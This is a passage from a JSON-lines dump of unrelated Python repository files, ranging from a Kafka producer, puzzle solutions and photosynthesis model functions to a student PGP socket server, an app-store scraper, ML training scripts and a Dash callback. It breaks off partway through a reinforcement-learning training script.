{}')\n","repo_name":"digas06/Aprendizado_Python","sub_path":"Modulo02/Etruturas_de_controle/71.py","file_name":"71.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19628913112","text":"#kafka stream user\r\nfrom confluent_kafka import Producer\r\nimport requests\r\nimport json\r\nimport time \r\n\r\n# define url source and request data\r\nurl = 'https://dummyjson.com/users'\r\nresponse = requests.get(url)\r\n\r\n# read and parse the data using json()\r\nusers = response.json()\r\n \r\n# define the producer by specifying the port of Kafka cluster\r\np = Producer({'bootstrap.servers':'localhost:9092'})\r\nprint('Kafka Producer Started...')\r\n\r\n# Define a callback function for errors. \r\n# Valid message will be decoded to utf-8 and printed in the\r\ndef receipt(err,msg):\r\n if err is not None:\r\n print('Error: {}'.format(err))\r\n else:\r\n message = 'Produced message on topic {} with value of {}\\n'.format(msg.topic(), msg.value().decode('utf-8'))\r\n print(message)\r\n\r\n# Define topic name here\r\ntopic_name = 'users'\r\n\r\ndef main():\r\n for user in users['users']: # in the json file users there is key namely 'users'\r\n p.produce(topic_name, json.dumps(user).encode('utf-8'), callback=receipt) # json.dumps(): convert dict to json file\r\n p.poll(1)\r\n p.flush()\r\n time.sleep(2) # suspends execution for 2 sec.\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"miftus/task8","sub_path":"producer_users.py","file_name":"producer_users.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22257277074","text":"#\tCatalan Numbers\n#https://open.kattis.com/problems/catalan\n\nd= {0: 1, 1: 1}\ndef catalan(n):\n if d.__contains__(n):\n return d[n]\n if n <= 500:\n d[n] = ((n << 2) - 2) * catalan(n-1) // (n + 1)\n else:\n catalan(n-500)\n d[n] = ((n << 2) - 2) * catalan(n-1) // (n + 1)\n return d[n]\nn=int(input())\nfor i in range(0, n):\n p=int(input())\n print(catalan(p))\n","repo_name":"sai034/KattisSolutions","sub_path":"catalanNumbers.py","file_name":"catalanNumbers.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"18775195810","text":"def find_subarr(input_lst, num):\n dict = {}\n sum = 0\n for idx, val in enumerate(input_lst):\n sum +=val\n if sum - num in dict:\n return (dict[sum-num],idx)\n elif val == num:\n return (idx,idx)\n else:\n dict[sum - val] = idx\n return ()\n","repo_name":"PavelBezzub/Applied-Python-2019","sub_path":"homework1/hw1_subarr.py","file_name":"hw1_subarr.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33526160580","text":"import numpy as np\r\n\r\n\r\ndef calc_optimal_chi(kmm, gammastar, ns_star, ca, vpd, beta):\r\n # -----------------------------------------------------------------------\r\n # Input: - float, 'kmm' : Pa, Michaelis-Menten coeff.\r\n # - float, 'ns_star' : (unitless) viscosity correction factor for water\r\n # - float, 'vpd' : Pa, vapor pressure deficit\r\n # Output: float, ratio of ci/ca (chi)\r\n # Features: Returns an estimate of leaf internal to ambient CO2\r\n # partial pressure following the \"simple formulation\".\r\n # Depends: - kc\r\n # - ns\r\n # - vpd\r\n # -----------------------------------------------------------------------\r\n\r\n # leaf-internal-to-ambient CO2 partial pressure (ci/ca) ratio\r\n xi = np.sqrt((beta * (kmm + gammastar)) / (1.6 * ns_star))\r\n chi = gammastar / ca + (1.0 - gammastar / ca) * xi / (xi + np.sqrt(vpd))\r\n\r\n # Define variable substitutes:\r\n vdcg = ca - gammastar\r\n vacg = ca + 2.0 * gammastar\r\n vbkg = beta * (kmm + gammastar)\r\n\r\n # wrap if condition in a function to allow vectorization\r\n\r\n def calc_mj(ns_star, vpd, vbkg):\r\n vsr = np.sqrt(1.6 * ns_star * vpd / vbkg)\r\n # Based on the mc' formulation (see Regressing_LUE.pdf)\r\n mj = vdcg / (vacg + 3.0 * gammastar * vsr)\r\n return mj\r\n\r\n # Check for negatives, vectorized\r\n if ns_star > 0 and vpd > 0 and vbkg > 0:\r\n mj = calc_mj(ns_star, vpd, vbkg)\r\n elif type(vpd) == 'float':\r\n mj = np.NaN\r\n else:\r\n mj = np.zeros(len(vpd))\r\n\r\n # alternative variables\r\n gamma = gammastar / ca\r\n kappa = kmm / ca\r\n\r\n # mc\r\n mc = (chi - gamma) / (chi + kappa)\r\n\r\n # mj:mv\r\n mjoc = (chi + kappa) / (chi + 2 * gamma)\r\n\r\n out = {'chi': chi, 'mc': mc, 'mj': mj, 'mjoc': mjoc}\r\n return out\r\n\r\n\r\ndef calc_lue_vcmax_wang17(out_optchi, kphio, ftemp_kphio, c_molmass, soilmstress):\r\n\r\n # Include effect of Jmax limitation\r\n if isinstance(out_optchi['chi'], float):\r\n leng = 1\r\n else:\r\n leng = len(out_optchi[[1]])\r\n mprime = calc_mprime(out_optchi['mj'])\r\n\r\n out = {\r\n # Light use efficiency (gpp per unit absorbed light)\r\n 'lue': kphio * ftemp_kphio * mprime * c_molmass * soilmstress,\r\n\r\n # Vcmax normalised per unit absorbed PPFD (assuming iabs=1), with Jmax limitation\r\n 'vcmax_unitiabs': kphio * ftemp_kphio * out_optchi['mjoc'] * mprime / out_optchi['mj'] * soilmstress,\r\n\r\n # complement for non-smith19\r\n 'omega': np.full(leng, np.NaN),\r\n 'omega_star': np.full(leng, np.NaN)\r\n }\r\n return out\r\n\r\n\r\ndef calc_lue_vcmax_smith19(out_optchi, kphio, ftemp_kphio, c_molmass, soilmstress):\r\n\r\n if isinstance(out_optchi['chi'], float):\r\n leng = 1\r\n else:\r\n leng = len(out_optchi[[1]])\r\n\r\n # Adopted from Nick Smith's code:\r\n # Calculate omega, see Smith et al., 2019 Ecology Letters\r\n def calc_omega(theta, c_cost, m):\r\n\r\n cm = 4 * c_cost / m # simplification term for omega calculation\r\n v =1 / (cm * (1 - theta * cm)) - 4 * theta # simplification term for omega calculation\r\n\r\n # account for non-linearities at low m values\r\n capP = (((1 / 1.4) - 0.7) **2 / (1 - theta)) + 3.4\r\n aquad = -1\r\n bquad = capP\r\n cquad = -(capP * theta)\r\n m_star = (4 * c_cost) / np.polynomial.polynomial.polyroots([aquad, bquad, cquad])\r\n\r\n if m < np.real(m_star[0]):\r\n omega = -(1 - (2 * theta)) - np.sqrt((1 - theta) * v)\r\n else:\r\n omega = -(1 - (2 * theta)) + np.sqrt((1 - theta) * v)\r\n return (omega)\r\n\r\n # constants\r\n theta = 0.85 # should be calibratable?\r\n c_cost = 0.05336251\r\n\r\n # factors derived as in Smith et al., 2019\r\n omega = calc_omega(theta=theta, c_cost=c_cost, m=out_optchi['mc'] ) # Eq. S4\r\n omega_star = 1.0 + omega - np.sqrt((1.0 + omega)**2 - (4.0 * theta * omega)) # Eq. 18\r\n\r\n # Effect of Jmax limitation\r\n mprime = out_optchi['mj'] * omega_star / (8.0 * theta)\r\n\r\n # Light use efficiency (gpp per unit absorbed light)\r\n lue = kphio * ftemp_kphio * mprime * c_molmass * soilmstress\r\n\r\n # calculate Vcmax per unit aborbed light\r\n vcmax_unitiabs = kphio * ftemp_kphio * out_optchi['mjoc'] * omega_star / (8.0 * theta) * soilmstress # Eq. 19\r\n\r\n out = {\r\n 'lue': lue,\r\n 'vcmax_unitiabs': vcmax_unitiabs,\r\n 'omega': omega,\r\n 'omega_star': omega_star\r\n }\r\n return out\r\n\r\n\r\ndef calc_lue_vcmax_none(out_optchi, kphio, ftemp_kphio, c_molmass, soilmstress):\r\n # Do not include effect of Jmax limitation\r\n if isinstance(out_optchi['chi'], float):\r\n leng = 1\r\n else:\r\n leng = len(out_optchi[[1]])\r\n\r\n out = {\r\n # Light use efficiency (gpp per unit absorbed light)\r\n 'lue': kphio * ftemp_kphio * out_optchi['mj'] * c_molmass * soilmstress,\r\n\r\n # Vcmax normalised per unit absorbed PPFD (assuming iabs=1), with Jmax limitation\r\n 'vcmax_unitiabs': kphio * ftemp_kphio * out_optchi['mjoc'] * soilmstress,\r\n\r\n # complement for non-smith19\r\n 'omega': np.full(leng, np.NaN),\r\n 'omega_star': np.full(leng, np.NaN)\r\n }\r\n return out\r\n\r\n\r\ndef calc_lue_vcmax_c4(kphio, ftemp_kphio, c_molmass, soilmstress):\r\n\r\n if isinstance(kphio, float):\r\n leng = 1\r\n else:\r\n leng = len(kphio)\r\n out = {\r\n # Light use efficiency (gpp per unit absorbed light)\r\n 'lue': kphio * ftemp_kphio * c_molmass * soilmstress,\r\n\r\n # Vcmax normalised per unit absorbed PPFD (assuming iabs=1), with Jmax limitation\r\n 'vcmax_unitiabs': kphio * ftemp_kphio * soilmstress,\r\n\r\n # complement for non-smith19\r\n 'omega': np.full(leng, np.NaN),\r\n 'omega_star': np.full(leng, np.NaN)\r\n }\r\n return out\r\n\r\n\r\ndef calc_chi_c4():\r\n # //////////////////////////////////////////////////////////////////\r\n # (Dummy-) ci:ca for C4 photosynthesis\r\n # -----------------------------------------------------------------------\r\n out ={'chi':9999, 'mc':1, 'mj':1, 'mjoc':1 }\r\n return out\r\n\r\n\r\ndef calc_mprime(mc):\r\n # -----------------------------------------------------------------------\r\n # Input: mc (unitless): factor determining LUE\r\n # Output: mpi (unitless): modiefied m accounting for the co-limitation\r\n # hypothesis after Prentice et al. (2014)\r\n # -----------------------------------------------------------------------\r\n kc = 0.41 # Jmax cost coefficient\r\n\r\n mpi = mc**2 - kc**(2.0 / 3.0) * (mc**(4.0 / 3.0))\r\n\r\n # Check for negatives:\r\n if mpi > 0:\r\n mpi = np.sqrt(mpi)\r\n else:\r\n mpi = np.NaN\r\n return mpi\r\n\r\n\r\ndef co2_to_ca(co2, patm):\r\n\r\n # -----------------------------------------------------------------------\r\n # Input: - float, annual atm. CO2, ppm (co2)\r\n # - float, monthly atm. pressure, Pa (patm)\r\n # Output: - ca in units of Pa\r\n # Features: Converts ca (ambient CO2) from ppm to Pa.\r\n # -----------------------------------------------------------------------\r\n ca = 1.0e-6 * co2 * patm # Pa, atms. CO2\r\n return ca\r\n\r\n\r\ndef density_h2o(tc, p):\r\n\r\n # -----------------------------------------------------------------------\r\n # Input: - float, air temperature (tc), degrees C\r\n # - float, atmospheric pressure (p), Pa\r\n # Output: float, density of water, kg/m^3\r\n # Features: Calculates density of water at a given temperature and\r\n # pressure using the Tumlirz Equation\r\n # Ref: F.H. Fisher and O.E Dial, Jr. (1975) Equation of state of\r\n # pure water and sea water, Tech. Rept., Marine Physical\r\n # Laboratory, San Diego, CA.\r\n # -----------------------------------------------------------------------\r\n\r\n # Calculate lambda, (bar cm^3)/g:\r\n my_lambda = 1788.316 + 21.55053 * tc + -0.4695911 * tc * tc + 3.096363e-3 * tc * tc * tc + \\\r\n -7.341182e-6 * tc * tc * tc * tc\r\n\r\n # Calculate po, bar\r\n po = 5918.499 + 58.05267 * tc + -1.1253317 * tc * tc + 6.6123869e-3 * tc * tc * tc + \\\r\n -1.4661625e-5 * tc * tc * tc * tc\r\n\r\n # Calculate vinf, cm^3/g\r\n vinf = 0.6980547 + -7.435626e-4 * tc + 3.704258e-5 * tc * tc + -6.315724e-7 * tc * tc * tc + \\\r\n 9.829576e-9 * tc * tc * tc * tc + -1.197269e-10 * tc * tc * tc * tc * tc + \\\r\n 1.005461e-12 * tc * tc * tc * tc * tc * tc + \\\r\n -5.437898e-15 * tc * tc * tc * tc * tc * tc * tc + \\\r\n 1.69946e-17 * tc * tc * tc * tc * tc * tc * tc * tc + \\\r\n -2.295063e-20 * tc * tc * tc * tc * tc * tc * tc * tc * tc\r\n\r\n # Convert pressure to bars (1 bar <- 100000 Pa)\r\n pbar = 1e-5 * p\r\n\r\n # Calculate the specific volume (cm^3 g^-1):\r\n v = vinf + my_lambda / (po + pbar)\r\n\r\n # Convert to density (g cm^-3) -> 1000 g/kg; 1000000 cm^3/m^3 -> kg/m^3:\r\n rho = (1e3 / v)\r\n\r\n return rho\r\n\r\n\r\ndef calc_viscosity_h2o(tc, p):\r\n # -----------------------------------------------------------------------\r\n # Input: - float, ambient temperature (tc), degrees C\r\n # - float, ambient pressure (p), Pa\r\n # Return: float, viscosity of water (mu), Pa s\r\n # Features: Calculates viscosity of water at a given temperature and\r\n # pressure.\r\n # Depends: density_h2o\r\n # Ref: Huber, M. L., R. A. Perkins, A. Laesecke, D. G. Friend, J. V.\r\n # Sengers, M. J. Assael, ..., K. Miyagawa (2009) New\r\n # international formulation for the viscosity of H2O, J. Phys.\r\n # Chem. Ref. Data, Vol. 38(2), pp. 101-125.\r\n # -----------------------------------------------------------------------\r\n # Define reference temperature, density, and pressure values:\r\n tk_ast = 647.096 # Kelvin\r\n rho_ast = 322.0 # kg/m^3\r\n mu_ast = 1e-6 # Pa s\r\n\r\n # Get the density of water, kg/m^3\r\n rho = density_h2o(tc, p)\r\n\r\n # Calculate dimensionless parameters:\r\n tbar = (tc + 273.15) / tk_ast\r\n tbarx = tbar**0.5\r\n tbar2 = tbar**2\r\n tbar3 = tbar**3\r\n rbar = rho / rho_ast\r\n\r\n # Calculate mu0 (Eq. 11 & Table 2, Huber et al., 2009):\r\n mu0 = 1.67752 + 2.20462 / tbar + 0.6366564 / tbar2 - 0.241605 / tbar3\r\n mu0 = 1e2 * tbarx / mu0\r\n\r\n # Create Table 3, Huber et al. (2009):\r\n h_array = np.zeros([7, 6])\r\n h_array[0, :] = [0.520094, 0.0850895, -1.08374, -0.289555, 0.0, 0.0] # hj0\r\n h_array[1, :] = [0.222531, 0.999115, 1.88797, 1.26613, 0.0, 0.120573] # hj1\r\n h_array[2, :] = [-0.281378, -0.906851, -0.772479, -0.489837, -0.257040, 0.0] # hj2\r\n h_array[3, :] = [0.161913, 0.257399, 0.0, 0.0, 0.0, 0.0] # hj3\r\n h_array[4, :] = [-0.0325372, 0.0, 0.0, 0.0698452, 0.0, 0.0] # hj4\r\n h_array[5, :] = [0.0, 0.0, 0.0, 0.0, 0.00872102, 0.0] # hj5\r\n h_array[6, :] = [0.0, 0.0, 0.0, -0.00435673, 0.0, -0.000593264] # hj6\r\n\r\n # Calculate mu1 (Eq. 12 & Table 3, Huber et al., 2009):\r\n mu1 = 0.0\r\n ctbar = (1.0 / tbar) - 1.0\r\n # print(paste(\"ctbar\",ctbar))\r\n # for i in xrange(6):\r\n for i in range(0, 6):\r\n coef1 = ctbar**(i - 1)\r\n coef2 = 0.0\r\n for j in range(0, 7):\r\n coef2 = coef2 + h_array[j, i] * (rbar - 1.0) ** (j - 1)\r\n mu1 = mu1 + coef1 * coef2\r\n mu1 = np.exp(rbar * mu1)\r\n # print(paste(\"mu1\",mu1))\r\n\r\n # Calculate mu_bar (Eq. 2, Huber et al., 2009)\r\n # assumes mu2 = 1\r\n mu_bar = mu0 * mu1\r\n\r\n # Calculate mu (Eq. 1, Huber et al., 2009)\r\n mu = mu_bar * mu_ast # Pa s\r\n\r\n return mu","repo_name":"jinmuluo/P-model","sub_path":"fuc.py","file_name":"fuc.py","file_ext":"py","file_size_in_byte":11723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14182809131","text":"'''\r\nhash table\r\n\r\n执行用时:180 ms, 在所有 Python3 提交中击败了15.66% 的用户\r\n内存消耗:20.6 MB, 在所有 Python3 提交中击败了49.40% 的用户\r\n通过测试用例:38 / 38\r\n'''\r\nclass Solution:\r\n def findingUsersActiveMinutes(self, logs: List[List[int]], k: int) -> List[int]:\r\n id2times = defaultdict(set)\r\n for id, time in logs:\r\n id2times[id].add(time)\r\n freq = Counter(len(v) for v in id2times.values())\r\n return [freq[i] for i in range(1, k + 1)]\r\n\r\n'''\r\nhash table\r\n\r\n执行用时:100 ms, 在所有 Python3 提交中击败了84.34% 的用户\r\n内存消耗:20.9 MB, 在所有 Python3 提交中击败了36.15% 的用户\r\n通过测试用例:38 / 38\r\n'''\r\nclass Solution:\r\n def findingUsersActiveMinutes(self, logs: List[List[int]], k: int) -> List[int]:\r\n id2times = defaultdict(set)\r\n for id, time in logs:\r\n id2times[id].add(time)\r\n ans = [0] * k\r\n for id, times in id2times.items():\r\n ans[len(times) - 1] += 1\r\n return ans \r\n\r\n","repo_name":"lixiang2017/leetcode","sub_path":"leetcode-cn/1817.0_Finding_the_Users_Active_Minutes.py","file_name":"1817.0_Finding_the_Users_Active_Minutes.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18525703763","text":"from levels.models import Level, Field, Hero, Object\n\n\ndef level(name, map):\n _assert_map_format_is_valid(map)\n width, height = len(map[0]), len(map)\n x, y = 0, height-1\n objects = {}\n\n for line in map:\n for char in line:\n if char not in level_object_ctors:\n x += 1\n continue\n object = create_level_object(x, y, char)\n if object.name not in objects:\n objects[object.name] = []\n objects[object.name].append(object)\n x += 1\n y -= 1\n x = 0\n\n field = Field(width, height, objects)\n return Level(name, field)\n\n\ndef _assert_map_format_is_valid(map):\n assert type(map) == list, f'Map must be an array of strings but was a {type(map)}.'\n assert all(type(line) == str for line in map), 'Map must be an array of strings.'\n width, height = len(map[0]), len(map)\n assert all(len(line) == width for line in map), 'Map mustn\\'t have varying width.'\n assert width > 0 or height > 0, f'Map size ({width}, {height}) is invalid.'\n\n\ndef create_level_object(x, y, char):\n return level_object_ctors[char](x, y)\n\n\ndef level_to_json(level):\n if level.name in cached_level_jsons:\n return cached_level_jsons[level.name]\n\n objects_json = {}\n \n for object_list in level.field.objects.values():\n for object in object_list:\n if object.name == 'Hero' or object.name == 'Exit': \n continue\n position_json = f'{object.position.x},{object.position.y}'\n if position_json not in objects_json:\n objects_json[position_json] = []\n objects_json[position_json].append(object.name)\n\n cached_level_jsons[level.name] = {\n 'size': {\n 'width': level.field.width,\n 'height': level.field.height\n },\n 'hero': {\n 'x': level.field.hero.position.x,\n 'y': level.field.hero.position.y,\n },\n 'exit': {\n 'x': level.field.exit.position.x,\n 'y': level.field.exit.position.y,\n },\n 'objects': objects_json\n }\n\n return cached_level_jsons[level.name]\n\n\ncached_level_jsons = {}\n\nlevel_object_ctors = {\n 'H': lambda x, y: Hero(x, y),\n 'P': lambda x, y: Object('Puddle', x, y),\n 'E': lambda x, y: Object('Exit', x, y)\n}\n\nlevels = {\n 1: level('level1', [\n '...',\n '..E',\n 'H..',\n ]),\n 2: level('level2', [\n '...',\n '..E',\n 'P.P',\n 'H..',\n ]),\n 3: level('level3', [\n '..H',\n '.PP',\n '...',\n 'PPE',\n ])\n}","repo_name":"DmitryM210/beanie","sub_path":"beanie/levels/levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3392148433","text":"import socket\nimport pickle\nimport base64\nimport sys\nimport os\nfrom Crypto.Signature import PKCS1_v1_5\nfrom Crypto.Hash import SHA256\nfrom Crypto.PublicKey import RSA\n\ncurrent = os.path.dirname(os.path.realpath(__file__))\nparent = os.path.dirname(current)\nsys.path.append(parent)\nfrom pgp import PGP\n\n\nclass Server:\n def __init__(self, ip, port):\n # Create socket\n try:\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n except socket.error as err:\n print(\"socket creation failed with error %s\" % err)\n # Init socket params\n self.s.bind((ip, port))\n print(\"starting server on port \" + str(port))\n path = os.path.dirname(os.path.realpath(__file__)) + \"\\\\bin\"\n self.pgp = PGP(path)\n private_key_file = open(\"certtest/my_private.key\", \"rb\").read()\n self.private_key = RSA.importKey(private_key_file)\n self.signer = PKCS1_v1_5.new(self.private_key)\n # TEMP\n # client_public_key_file = open(\"certtest/my_public.key\", \"rb\").read()\n # client_public_key = RSA.importKey(client_public_key_file)\n # client_verifier = PKCS1_v1_5.new(client_public_key)\n #\n # test_string = \"Hello\"\n # test_hashed = SHA256.new(data=bytes(test_string, \"utf-8\"))\n # signature = self.signer.sign(test_hashed)\n # print(client_verifier.verify(test_hashed, signature))\n\n\n def listen(self):\n self.s.listen(1)\n\n def accept(self):\n conn, addr = self.s.accept()\n print('Connected by', addr)\n return conn, addr\n\n def listKeys(self):\n public = pickle.dumps(self.pgp.list_public_keys())\n private = pickle.dumps(self.pgp.list_private_keys())\n public = base64.b64encode(public).decode('ascii')\n private = base64.b64encode(private).decode('ascii')\n packet = \"list private %s endprivate public %s endpublic\" % (private, public)\n return packet\n\n def sendFile(self,path:str,id: str,conn: socket):\n size = os.path.getsize(path)\n path = os.path.abspath(path)\n\n msg = \"file %d %s\" % (size,id)\n print(\"sending %s size %d name %s\" % (path,size,id))\n conn.send(msg.encode())\n\n f = open(path, \"rb\")\n while True:\n data = f.read(1024)\n \n if data:\n conn.send(data)\n else:\n f.close()\n break\n\n\n def addKeys(self, data):\n try:\n if \"PUBLIC\" in data:\n key_start = data.find(\"-----BEGIN PGP PUBLIC KEY BLOCK-----\")\n key_end = data.find(\"-----END PGP PUBLIC KEY BLOCK-----\") + len(\"-----END PGP PUBLIC KEY BLOCK-----\")\n key_string = data[key_start:key_end]\n self.pgp.add_key(key_string)\n elif \"PRIVATE\" in data:\n key_start = data.find(\"-----BEGIN PGP PRIVATE KEY BLOCK-----\")\n key_end = data.find(\"-----END PGP PRIVATE KEY BLOCK-----\") + len(\"-----END PGP PRIVATE KEY BLOCK-----\")\n key_string = data[key_start:key_end]\n self.pgp.add_key(key_string)\n return \"OK\"\n except EOFError:\n return \"Incorrect input\"\n\n def prepare_signature(self, command, data):\n data_hashed = SHA256.new(data=bytes(data, \"utf-8\"))\n signature = self.signer.sign(data_hashed)\n packet = [command, data, signature]\n packet_string = pickle.dumps(packet)\n packet_string = base64.b64encode(packet_string).decode('ascii')\n return packet_string\n\n def connection(self, conn: socket, addr):\n while True:\n data = conn.recv(10000)\n if data:\n data = data.decode()\n if data[:4] == \"list\":\n keys = self.listKeys()\n packet_string = self.prepare_signature(\"list\", keys)\n conn.send(packet_string.encode())\n elif data[:4] == \"sign\":\n cert = \"pickle.\"\n self.pgp.sign(cert)\n elif data[:6] == \"verify\":\n self.pgp.verify()\n elif data[:3] == \"add\":\n res = self.addKeys(data)\n conn.send(res.encode())\n elif data[:4] == \"file\":\n data = data.split(\" \")\n if data[1]:\n path = os.path.dirname(os.path.realpath(__file__)) + \"\\\\files\\\\\"\n path = path + data[1]\n self.sendFile(path,data[1],conn);\n else:\n error = \"usage: file \"\n print(error)\n conn.send(error.encode())\n else:\n error = \"unexpected command %s\" % (data)\n print(error)\n conn.send(error.encode())\n else:\n print(\"Client quit, closing\", addr)\n conn.close()\n break","repo_name":"koaie/F20CN_CW2","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7016444692","text":"import play_scraper as scraper\nimport urllib.request\n\ndef scrapeCollectionScreenShots(collectionName):\n apps = scraper.collection(collection = collectionName)\n fileNameCount = 0\n for appDict in apps:\n currentAppID = appDict['app_id']\n\n currentAppDetailsDict = scraper.details(currentAppID)\n\n\n icoin = currentAppDetailsDict['icon']\n appName = currentAppDetailsDict['title']\n\n # if 'GAME' in currentAppDetailsDict['category']:\n # print('GameFound')\n # continue\n\n urllib.request.urlretrieve(icoin, \n appName+'.png')\n\n fileNameCount += 1\n\n\n \n\n\ndef scrapeDeveloperScreenShots(developerName):\n apps = scraper.developer(developerName, results = 120)\n\n fileNameCount = 0\n \n for appDict in apps:\n currentAppID = appDict['app_id']\n\n currentAppDetailsDict = scraper.details(currentAppID)\n\n\n screenshotList = currentAppDetailsDict['screenshots']\n\n for screenshoturl in screenshotList:\n urllib.request.urlretrieve(screenshoturl, \n 'material' + str(fileNameCount))\n\n fileNameCount += 1\n\n# scrapeDeveloperScreenShots('Google Inc.')\nscrapeCollectionScreenShots('TOP_PAID')\n\n\n\n","repo_name":"GautamBose/Deep-Learning-Workshop","sub_path":"playStoreScraper.py","file_name":"playStoreScraper.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23869351185","text":"import pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nimport pickle\nimport numpy as np\nimport argparse\n\n\n# Train model on full training set after best hyperparameters were selected with validation curve\n# The evaluation is afterwards done with evaluate_final_model.py\n\ndef trainSVM(train_on_average_features, C, gamma):\n print('Reading training data')\n df_train = pd.read_csv('./data/report_features_std_train.csv', sep='\\t')\n\n X_train = None\n if train_on_average_features:\n X_train = df_train.drop(['CIK', 'Ticker', 'Company', 'Filing_Date', 'Form_Type', 'Change_Ratio', 'Change_Nominal', 'File_Path'], axis=1).values[:, :768]\n else:\n X_train = df_train.drop(['CIK', 'Ticker', 'Company', 'Filing_Date', 'Form_Type', 'Change_Ratio', 'Change_Nominal', 'File_Path'], axis=1).values\n \n _, y_train = np.unique(df_train['Change_Nominal'].values, return_inverse=True)\n\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n\n print('Fitting on data...')\n model = SVC(kernel=\"rbf\", C=C, gamma=gamma, probability=True)\n model.fit(X_train, y_train)\n\n print('Saving model...')\n if train_on_average_features:\n with open('./data/svm_avg.pkl', 'wb') as fid:\n pickle.dump(model, fid)\n else:\n with open('./data/svm_std.pkl', 'wb') as fid:\n pickle.dump(model, fid)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Select model path and name.')\n parser.add_argument('--train_on_average_features', dest='train_on_average_features', action='store_true')\n parser.add_argument('--C', dest='C', type=float)\n parser.add_argument('--gamma', dest='gamma', type=float)\n args = parser.parse_args()\n trainSVM(args.train_on_average_features, args.C, args.gamma)","repo_name":"FrederikBoehm/Bachelorarbeit_Code","sub_path":"classification/train_svm.py","file_name":"train_svm.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31911592990","text":"from pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nfrom dash.dependencies import Input, Output\nfrom dash.exceptions import PreventUpdate\nimport plotly.graph_objects as go\n\nfrom vicinity.app import app\nfrom vicinity import core\n\n\n@app.callback([Output('table', 'data'), Output('table', 'columns')],\n Input('file_path', 'value'),\n Input('lat_degrees', 'value'),\n Input('lon_degrees', 'value'),\n Input('radius_km', 'value'))\ndef table_data_columns(file_path, lat_degrees, lon_degrees, radius_km):\n df = try_read_cached_csv(file_path)\n\n radius_km = parse_float(radius_km)\n if np.isnan(radius_km):\n radius_km = core.EARTH_DIAMETER_KM / 2.0\n\n lat_degrees = parse_float(lat_degrees)\n lon_degrees = parse_float(lon_degrees)\n if np.isnan(lat_degrees) or np.isnan(lon_degrees):\n return transform_df_into_dash_data_table(df)\n\n df = core.compute_vicinity(df, lat_degrees, lon_degrees, radius_km)\n return transform_df_into_dash_data_table(df)\n\n\ndef transform_df_into_dash_data_table(df):\n data = df.to_dict('records')\n columns = [{ 'name': c, 'id': c } for c in df]\n return data, columns\n\n\ndef try_read_cached_csv(file_path):\n test_df = core.read_cached_csv('data/siga-empreendimentos-geracao.csv')\n print(test_df)\n try:\n return core.read_cached_csv(file_path)\n except:\n raise PreventUpdate\n\n\ndef parse_float(value):\n try:\n return float(value)\n except:\n return np.nan","repo_name":"diogofriggo/vicinity","sub_path":"vicinity/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14433568086","text":"import os, sys\nfrom codetiming import Timer\nimport jax\nimport jax.numpy as jnp\nimport chex\nimport haiku as hk\nfrom observable import Observable\nfrom omegaconf import OmegaConf\nimport hydra\nfrom modular_rollouts import create_env\nfrom evaluation import eval_rollouts\nfrom agents.agent import AgentOffPolicy\nfrom utils import check_env, get_uniform_action_sample_fct, ReplayBuffer\n\n# TODO : general reorganisation :\n# => More efficent main train function for pure jax ?\n# => If the replay buffer is moved inside the agent, it simplifies the genericity of the main loop\n\n\n@hydra.main(config_path=f\"{os.getcwd()}/configs/\", config_name=\"sac_gym.yaml\")\ndef train(hydra_config):\n ################ INIT ################\n cfg = OmegaConf.to_container(hydra_config, resolve=True)\n\n seed = cfg[\"seed\"]\n num_envs = cfg[\"env\"][\"num_envs\"]\n num_evals = cfg[\"env\"][\"num_eval\"]\n eval_every = cfg[\"env\"][\"eval_every\"]\n agent_cfg = cfg[\"train\"]\n total_train_step = agent_cfg[\"total_train_step\"]\n start_training_after_x_steps = agent_cfg[\"start_training_after_x_steps\"]\n max_replay_size = agent_cfg[\"max_replay_size\"]\n batch_size = agent_cfg[\"batch_size\"]\n grad_steps_per_step = agent_cfg[\"grad_steps_per_step\"]\n\n rng = hk.PRNGSequence(jax.random.PRNGKey(seed))\n\n # init env :\n env, eval_env = create_env(\n env_engine=cfg[\"env\"][\"env_engine\"],\n env_name=cfg[\"env\"][\"name\"],\n max_step=cfg[\"env\"][\"episode_max_length\"],\n n_eval_env=num_evals,\n n_train_env=num_envs,\n action_type=chex.Array,\n n_pop=1,\n seed=seed,\n )\n # check_env(env)\n first_obs, info = env.reset(seed=seed)\n\n # init agent :\n agent: AgentOffPolicy = hydra.utils.instantiate(\n cfg[\"train\"][\"agent\"], action_space=env.single_action_space\n )\n agent_state = agent.initialize(dummy_obs=first_obs, key=next(rng))\n\n # init logger :\n event = Observable()\n logger = hydra.utils.instantiate(\n cfg[\"log\"][\"logger\"], _recursive_=False, wandb_cfg=cfg\n )\n logger.register(event)\n\n # init 